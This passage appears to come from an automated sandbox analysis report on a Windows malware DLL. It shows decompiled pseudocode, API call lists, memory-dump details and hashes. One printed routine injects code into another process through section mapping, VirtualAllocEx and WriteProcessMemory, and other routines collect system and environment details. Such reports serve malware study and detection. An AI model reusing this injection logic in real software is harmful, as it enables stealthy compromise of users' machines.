                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t12 = _t222 + 0x220; // 0x220, executed
                                                                                                                                                                                                				_t91 = E1000E433(_t12); // executed
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
                                                                                                                                                                                                				_t92 = E1000E3F8(_t12); // executed
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                				 *(_t222 + 0x224) = _t162;
                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                				_v12 = 0x80;
                                                                                                                                                                                                				_push( &_v692);
                                                                                                                                                                                                				_v8 = 0x100;
                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                				_t22 = _t222 + 0x114; // 0x114
                                                                                                                                                                                                				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                                                                                                                                                                                                				_push(0); // executed
                                                                                                                                                                                                				if(GetLastError() == 0) {
                                                                                                                                                                                                					GetLastError();
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t98 = GetSystemMetrics(0x1000);
                                                                                                                                                                                                				_t26 = _t222 + 0x228; // 0x228
                                                                                                                                                                                                				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                                                                                                                                                                                                				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                                                                                                                                                                                                				GetLastError();
                                                                                                                                                                                                				_t31 = _t222 + 0x228; // 0x228
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0x434)) = E10008F9F(_t31, _t98);
                                                                                                                                                                                                				_t34 = _t222 + 0x114; // 0x114, executed
                                                                                                                                                                                                				_t103 = E1000B7EA(_t34,  &_v692);
                                                                                                                                                                                                				_t35 = _t222 + 0xb0; // 0xb0
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                                                                                                                                                                                                				_push(_t35);
                                                                                                                                                                                                				E1000B6BF(_t103, _t35, _t98, _t241);
                                                                                                                                                                                                				_t37 = _t222 + 0xb0; // 0xb0
                                                                                                                                                                                                				_t105 = _t37;
                                                                                                                                                                                                				_t38 = _t222 + 0xd0; // 0xd0
                                                                                                                                                                                                				_t164 = _t38;
                                                                                                                                                                                                				if(_t105 != 0) {
                                                                                                                                                                                                					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                                                                                                                                                                                                					if(_t159 > 0) {
                                                                                                                                                                                                						_t164[_t159] = 0;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t41 = _t222 + 0x438; // 0x438
                                                                                                                                                                                                				_t42 = _t222 + 0x228; // 0x228
                                                                                                                                                                                                				E10008FB9(_t42, _t41);
                                                                                                                                                                                                				_t43 = _t222 + 0xb0; // 0xb0
                                                                                                                                                                                                				_t108 = E1000D442(_t43, E1000C3BB(_t43), 0);
                                                                                                                                                                                                				_t44 = _t222 + 0x100c; // 0x100c
                                                                                                                                                                                                				E1000B8CC(_t108, _t44, _t241);
                                                                                                                                                                                                				_t199 = GetCurrentProcess(); // executed
                                                                                                                                                                                                				_t111 = E1000BC21(_t110); // executed
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
                                                                                                                                                                                                				memset(_t222, 0, 0x9c);
                                                                                                                                                                                                				_t224 = _t223 + 0xc;
                                                                                                                                                                                                				_t222->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                				GetVersionExA(_t222);
                                                                                                                                                                                                				_t167 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				_t115 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                                                                                                                                                                                                					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                					_t115 = _v8;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                                                                                                                                                                                                				if(_t115 == 0) {
                                                                                                                                                                                                					GetSystemInfo( &_v52);
                                                                                                                                                                                                					_t117 = _v52.dwOemId & 0x0000ffff;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t117 = 9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t54 = _t222 + 0x1020; // 0x1020
                                                                                                                                                                                                				_t168 = _t54;
                                                                                                                                                                                                				 *(_t222 + 0x9c) = _t117;
                                                                                                                                                                                                				GetWindowsDirectoryW(_t168, 0x104);
                                                                                                                                                                                                				_t119 = E100095C2(_t199, 0x10c);
                                                                                                                                                                                                				_t200 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				_t218 = _t119;
                                                                                                                                                                                                				 *_t224 = 0x104;
                                                                                                                                                                                                				_push( &_v704);
                                                                                                                                                                                                				_push(_t218);
                                                                                                                                                                                                				_v8 = _t218;
                                                                                                                                                                                                				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                                                                                                                                                                                                					_t154 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				E100085B6( &_v8);
                                                                                                                                                                                                				_t124 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				_t61 = _t222 + 0x1434; // 0x1434
                                                                                                                                                                                                				_t219 = _t61;
                                                                                                                                                                                                				 *_t224 = 0x209;
                                                                                                                                                                                                				_push(_t219);
                                                                                                                                                                                                				_push(L"USERPROFILE");
                                                                                                                                                                                                				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                                                                                                                                                                                					E10009621(_t219, 0x105, L"%s\\%s", _t168);
                                                                                                                                                                                                					_t152 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                					_t224 =  &(_t224[5]);
                                                                                                                                                                                                					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_push(0x20a);
                                                                                                                                                                                                				_t64 = _t222 + 0x122a; // 0x122a
                                                                                                                                                                                                				_t169 = L"TEMP";
                                                                                                                                                                                                				_t127 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				_push(_t169);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                                                                                                                                                                                					_t149 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_push(0x40);
                                                                                                                                                                                                				_t220 = L"SystemDrive";
                                                                                                                                                                                                				_push( &_v180);
                                                                                                                                                                                                				_t130 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				_push(_t220);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                                                                                                                                                                                					_t147 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_v8 = 0x7f;
                                                                                                                                                                                                				_t72 = _t222 + 0x199c; // 0x199c
                                                                                                                                                                                                				_t134 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                                                                                                                                                                                				_t75 = _t222 + 0x100c; // 0x100c
                                                                                                                                                                                                				E10012339(E1000D442(_t75, E1000C3BB(_t75), 0),  &_v2680);
                                                                                                                                                                                                				_t76 = _t222 + 0x1858; // 0x1858
                                                                                                                                                                                                				E1001230B( &_v2680, _t76, 0x20);
                                                                                                                                                                                                				_t79 = _t222 + 0x1878; // 0x1878
                                                                                                                                                                                                				E1000900E(1, _t79, 0x14, 0x1e,  &_v2680);
                                                                                                                                                                                                				_t145 = E1000CD75(_t79); // executed
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
                                                                                                                                                                                                				return _t222;
                                                                                                                                                                                                			}

                                                                                                                                                                                                0x1000d1ee
                                                                                                                                                                                                0x1000d1f4
                                                                                                                                                                                                0x1000d1f4
                                                                                                                                                                                                0x1000d1fd
                                                                                                                                                                                                0x1000d209
                                                                                                                                                                                                0x1000d211
                                                                                                                                                                                                0x1000d215
                                                                                                                                                                                                0x1000d215
                                                                                                                                                                                                0x1000d211
                                                                                                                                                                                                0x1000d219
                                                                                                                                                                                                0x1000d21f
                                                                                                                                                                                                0x1000d225
                                                                                                                                                                                                0x1000d22c
                                                                                                                                                                                                0x1000d23d
                                                                                                                                                                                                0x1000d243
                                                                                                                                                                                                0x1000d24b
                                                                                                                                                                                                0x1000d252
                                                                                                                                                                                                0x1000d254
                                                                                                                                                                                                0x1000d265
                                                                                                                                                                                                0x1000d26b
                                                                                                                                                                                                0x1000d270
                                                                                                                                                                                                0x1000d273
                                                                                                                                                                                                0x1000d276
                                                                                                                                                                                                0x1000d27c
                                                                                                                                                                                                0x1000d282
                                                                                                                                                                                                0x1000d284
                                                                                                                                                                                                0x1000d28a
                                                                                                                                                                                                0x1000d293
                                                                                                                                                                                                0x1000d296
                                                                                                                                                                                                0x1000d296
                                                                                                                                                                                                0x1000d299
                                                                                                                                                                                                0x1000d2a1
                                                                                                                                                                                                0x1000d2ac
                                                                                                                                                                                                0x1000d2b2
                                                                                                                                                                                                0x1000d2a3
                                                                                                                                                                                                0x1000d2a5
                                                                                                                                                                                                0x1000d2a5
                                                                                                                                                                                                0x1000d2bb
                                                                                                                                                                                                0x1000d2bb
                                                                                                                                                                                                0x1000d2c1
                                                                                                                                                                                                0x1000d2c9
                                                                                                                                                                                                0x1000d2d4
                                                                                                                                                                                                0x1000d2d9
                                                                                                                                                                                                0x1000d2df
                                                                                                                                                                                                0x1000d2e1
                                                                                                                                                                                                0x1000d2ee
                                                                                                                                                                                                0x1000d2ef
                                                                                                                                                                                                0x1000d2f0
                                                                                                                                                                                                0x1000d2fb
                                                                                                                                                                                                0x1000d2fd
                                                                                                                                                                                                0x1000d304
                                                                                                                                                                                                0x1000d304
                                                                                                                                                                                                0x1000d30e
                                                                                                                                                                                                0x1000d313
                                                                                                                                                                                                0x1000d318
                                                                                                                                                                                                0x1000d318
                                                                                                                                                                                                0x1000d31e
                                                                                                                                                                                                0x1000d325
                                                                                                                                                                                                0x1000d326
                                                                                                                                                                                                0x1000d333
                                                                                                                                                                                                0x1000d346
                                                                                                                                                                                                0x1000d34b
                                                                                                                                                                                                0x1000d350
                                                                                                                                                                                                0x1000d359
                                                                                                                                                                                                0x1000d359
                                                                                                                                                                                                0x1000d35f
                                                                                                                                                                                                0x1000d364
                                                                                                                                                                                                0x1000d36a
                                                                                                                                                                                                0x1000d370
                                                                                                                                                                                                0x1000d375
                                                                                                                                                                                                0x1000d37e
                                                                                                                                                                                                0x1000d380
                                                                                                                                                                                                0x1000d387
                                                                                                                                                                                                0x1000d387
                                                                                                                                                                                                0x1000d38d
                                                                                                                                                                                                0x1000d395
                                                                                                                                                                                                0x1000d39a
                                                                                                                                                                                                0x1000d39b
                                                                                                                                                                                                0x1000d3a0
                                                                                                                                                                                                0x1000d3a9
                                                                                                                                                                                                0x1000d3ab
                                                                                                                                                                                                0x1000d3b6
                                                                                                                                                                                                0x1000d3b6
                                                                                                                                                                                                0x1000d3bf
                                                                                                                                                                                                0x1000d3c7
                                                                                                                                                                                                0x1000d3ce
                                                                                                                                                                                                0x1000d3d3
                                                                                                                                                                                                0x1000d3e2
                                                                                                                                                                                                0x1000d3fa
                                                                                                                                                                                                0x1000d401
                                                                                                                                                                                                0x1000d40f
                                                                                                                                                                                                0x1000d421
                                                                                                                                                                                                0x1000d428
                                                                                                                                                                                                0x1000d430
                                                                                                                                                                                                0x1000d435
                                                                                                                                                                                                0x00000000

APIs
  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
• GetCurrentProcessId.KERNEL32 ref: 1000D088
• GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D0C4
• GetCurrentProcess.KERNEL32 ref: 1000D0E1
• GetLastError.KERNEL32(00000000,?,00000114,00000080,?,?,?), ref: 1000D173
• GetLastError.KERNEL32 ref: 1000D180
• GetSystemMetrics.USER32(00001000), ref: 1000D18C
• GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D1AE
• GetLastError.KERNEL32 ref: 1000D1B4
• MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D209
• GetCurrentProcess.KERNEL32 ref: 1000D250
  • Part of subcall function 1000BAA4: CloseHandle.KERNELBASE(?,00000000,74E5F500,10000000), ref: 1000BB48
• memset.MSVCRT ref: 1000D26B
• GetVersionExA.KERNEL32(00000000), ref: 1000D276
• GetCurrentProcess.KERNEL32(00000100), ref: 1000D290
• IsWow64Process.KERNEL32(00000000), ref: 1000D293
• GetSystemInfo.KERNEL32(?), ref: 1000D2AC
• GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D2C9
Strings
Memory Dump Source
• Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
• Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
Similarity
• API ID: Process$Current$ErrorLast$FileModuleNameSystem$AllocByteCharCloseDirectoryHandleHeapInfoMetricsMultiVersionWideWindowsWow64memset
• String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
• API String ID: 3386120184-2706916422
• Opcode ID: d3c8a52316226b16e523e3f39415754c5eb9add7e1a416d3030c1f9eba03589a
• Instruction ID: 23cb5d85761a2f79723220f042d2e588453e1a85ee774e6f3551f9871d856d11
• Opcode Fuzzy Hash: d3c8a52316226b16e523e3f39415754c5eb9add7e1a416d3030c1f9eba03589a
• Instruction Fuzzy Hash: 82B14A75600705AFE714EB74CC89FEA77E8EF18380F01486EF55AD7295EB70AA448B21
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E1000C702(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                				long _v24;
                                                                                                                                                                                                				long _v28;
                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                				long _v40;
                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                				char _v56;
                                                                                                                                                                                                				char _v72;
                                                                                                                                                                                                				struct _WNDCLASSEXA _v120;
                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                				intOrPtr _t75;
                                                                                                                                                                                                				struct HWND__* _t106;
                                                                                                                                                                                                				intOrPtr* _t113;
                                                                                                                                                                                                				struct _EXCEPTION_RECORD _t116;
                                                                                                                                                                                                				void* _t126;
                                                                                                                                                                                                				void* _t131;
                                                                                                                                                                                                				intOrPtr _t134;
                                                                                                                                                                                                				void* _t140;
                                                                                                                                                                                                				void* _t141;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t69 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                				_t126 = __ecx;
                                                                                                                                                                                                				_t134 = __edx;
                                                                                                                                                                                                				_t116 = 0;
                                                                                                                                                                                                				_v36 = __edx;
                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                				_v44 = 0;
                                                                                                                                                                                                				_v40 = 0;
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                                                				_v20 = __ecx;
                                                                                                                                                                                                				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                                                                                                                                                                                					E1000E280(0x1f4);
                                                                                                                                                                                                					_t116 = 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                                                                                                                                                                                				_v28 = _t116;
                                                                                                                                                                                                				if( *_t113 != 0x4550) {
                                                                                                                                                                                                					L12:
                                                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                                                						_t75 =  *0x1001e780; // 0x4d2f9a0
                                                                                                                                                                                                						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                                                                                                                                                                                						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L14:
                                                                                                                                                                                                					if(_v12 != 0) {
                                                                                                                                                                                                						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(_v16 != 0) {
                                                                                                                                                                                                						NtClose(_v16);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                                                                                                                                                                                				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_v120.style = 0xb;
                                                                                                                                                                                                				_v120.cbSize = 0x30;
                                                                                                                                                                                                				_v120.lpszClassName =  &_v56;
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				_v120.lpfnWndProc = DefWindowProcA;
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				asm("movsb");
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				asm("movsd");
                                                                                                                                                                                                				asm("movsw");
                                                                                                                                                                                                				asm("movsb");
                                                                                                                                                                                                				_v120.cbWndExtra = 0;
                                                                                                                                                                                                				_v120.lpszMenuName = 0;
                                                                                                                                                                                                				_v120.cbClsExtra = 0;
                                                                                                                                                                                                				_v120.hInstance = 0;
                                                                                                                                                                                                				if(RegisterClassExA( &_v120) != 0) {
                                                                                                                                                                                                					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                                                                                                                                                                                                					if(_t106 != 0) {
                                                                                                                                                                                                						DestroyWindow(_t106);
                                                                                                                                                                                                						UnregisterClassA( &_v56, 0);
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                                                                                                                                                                                					_t126 = _v20;
                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t126 = _v20;
                                                                                                                                                                                                					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t140 = E1000864A( *0x1001e688, 0x1ac4);
                                                                                                                                                                                                					_v32 = _t140;
                                                                                                                                                                                                					if(_t140 == 0) {
                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                                                                                                                                                                                					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
                                                                                                                                                                                                					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                                                                                                                                                                                					E100085FB( &_v32, 0x1ac4);
                                                                                                                                                                                                					_t141 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                					 *0x1001e688 = _t131;
                                                                                                                                                                                                					E100086C2(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                                                                                                                                                                                					E1000C681(_v12, _v8, _v36);
                                                                                                                                                                                                					 *0x1001e688 = _t141;
                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}


























                                                                                                                                                                                                0x1000c7fa
                                                                                                                                                                                                0x1000c7fd
                                                                                                                                                                                                0x1000c808
                                                                                                                                                                                                0x1000c808
                                                                                                                                                                                                0x1000c7fa
                                                                                                                                                                                                0x1000c833
                                                                                                                                                                                                0x1000c8f4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000c839
                                                                                                                                                                                                0x1000c845
                                                                                                                                                                                                0x1000c85a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000c870
                                                                                                                                                                                                0x1000c872
                                                                                                                                                                                                0x1000c879
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000c88a
                                                                                                                                                                                                0x1000c8a1
                                                                                                                                                                                                0x1000c8b1
                                                                                                                                                                                                0x1000c8bd
                                                                                                                                                                                                0x1000c8c2
                                                                                                                                                                                                0x1000c8c8
                                                                                                                                                                                                0x1000c8d8
                                                                                                                                                                                                0x1000c8e4
                                                                                                                                                                                                0x1000c8ec
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000c8ec

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CCD), ref: 1000C775
                                                                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 1000C7C7
                                                                                                                                                                                                • CreateWindowExA.USER32 ref: 1000C7F2
                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 1000C7FD
                                                                                                                                                                                                • UnregisterClassA.USER32 ref: 1000C808
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C824
                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C82E
                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,1000CBE2,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C855
                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(1000CBE2,00000000,00001AC4,00001000,00000004), ref: 1000C898
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(1000CBE2,00000000,00000000,00001AC4,?), ref: 1000C8B1
                                                                                                                                                                                                  • Part of subcall function 100085FB: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006024), ref: 10008641
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 1000C91D
                                                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C924
                                                                                                                                                                                                • NtClose.NTDLL(00000000), ref: 1000C937
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                                                                                                                                                                                                • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                                                                                                                                                                                • API String ID: 2002808388-2319545179
                                                                                                                                                                                                • Opcode ID: 30471a9a4c683b7a67de2c4037cb7c39743ebf929aca841839c7d9ccad541335
                                                                                                                                                                                                • Instruction ID: dc3ac7719f08381f618c8310bb1be9f95b5925889f8563784b0ee3a3e9f177f1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 30471a9a4c683b7a67de2c4037cb7c39743ebf929aca841839c7d9ccad541335
                                                                                                                                                                                                • Instruction Fuzzy Hash: 10713971900259AFEB11CF95CD88EAFBBB9FF49740F214069F605B7290D770AA05CB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				short _v144;
                                                                                                                                                                                                				short _v664;
                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                				struct HINSTANCE__* _t22;
                                                                                                                                                                                                				long _t23;
                                                                                                                                                                                                				long _t24;
                                                                                                                                                                                                				char* _t27;
                                                                                                                                                                                                				WCHAR* _t32;
                                                                                                                                                                                                				long _t33;
                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES* _t53;
                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t49 = __edx;
                                                                                                                                                                                                				OutputDebugStringA("Hello qqq"); // executed
                                                                                                                                                                                                				if(_a8 != 1) {
                                                                                                                                                                                                					if(_a8 != 0) {
                                                                                                                                                                                                						L12:
                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					SetLastError(0xaa);
                                                                                                                                                                                                					L10:
                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				E100085D0();
                                                                                                                                                                                                				_t19 = E100097ED( &_v16);
                                                                                                                                                                                                				_t57 = _t49;
                                                                                                                                                                                                				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					E10008F59();
                                                                                                                                                                                                					GetModuleHandleA(0);
                                                                                                                                                                                                					_t22 = _a4;
                                                                                                                                                                                                					 *0x1001e69c = _t22;
                                                                                                                                                                                                					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                                                                                                                                                                                					_t24 = GetLastError();
                                                                                                                                                                                                					if(_t23 != 0 && _t24 != 0x7a) {
                                                                                                                                                                                                						memset( &_v144, 0, 0x80);
                                                                                                                                                                                                						_t55 = _t54 + 0xc;
                                                                                                                                                                                                						_t53 = 0;
                                                                                                                                                                                                						do {
                                                                                                                                                                                                							_t27 = E100095A8(_t53);
                                                                                                                                                                                                							_a8 = _t27;
                                                                                                                                                                                                							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                                                                                                                                                                                							E100085A3( &_a8);
                                                                                                                                                                                                							_t53 =  &(_t53->nLength);
                                                                                                                                                                                                						} while (_t53 < 0x2710);
                                                                                                                                                                                                						E10012A93( *0x1001e69c);
                                                                                                                                                                                                						 *_t55 = 0x7c3;
                                                                                                                                                                                                						 *0x1001e684 = E1000E1FE(0x1001ba20, 0x11c);
                                                                                                                                                                                                						 *_t55 = 0xb4e;
                                                                                                                                                                                                						_t32 = E100095C2(0x1001ba20);
                                                                                                                                                                                                						_a8 = _t32;
                                                                                                                                                                                                						_t33 = GetFileAttributesW(_t32); // executed
                                                                                                                                                                                                						_push( &_a8);
                                                                                                                                                                                                						if(_t33 == 0xffffffff) {
                                                                                                                                                                                                							E100085B6();
                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                							_t38 = CreateThread(0, 0, E10005DE7, 0, 0,  &_v8);
                                                                                                                                                                                                							 *0x1001e6a8 = _t38;
                                                                                                                                                                                                							if(_t38 == 0) {
                                                                                                                                                                                                								goto L10;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						E100085B6();
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}





















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • OutputDebugStringA.KERNELBASE(Hello qqq), ref: 10005F73
                                                                                                                                                                                                • SetLastError.KERNEL32(000000AA), ref: 100060B8
                                                                                                                                                                                                  • Part of subcall function 100085D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F88), ref: 100085D9
                                                                                                                                                                                                  • Part of subcall function 100097ED: GetSystemTimeAsFileTime.KERNEL32(?,?,10005F90), ref: 100097FA
                                                                                                                                                                                                  • Part of subcall function 100097ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000981A
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 10005FAD
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FC8
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 10005FD0
                                                                                                                                                                                                • memset.MSVCRT ref: 10005FF4
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006016
                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 10006064
                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,10005DE7,00000000,00000000,?), ref: 10006098
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
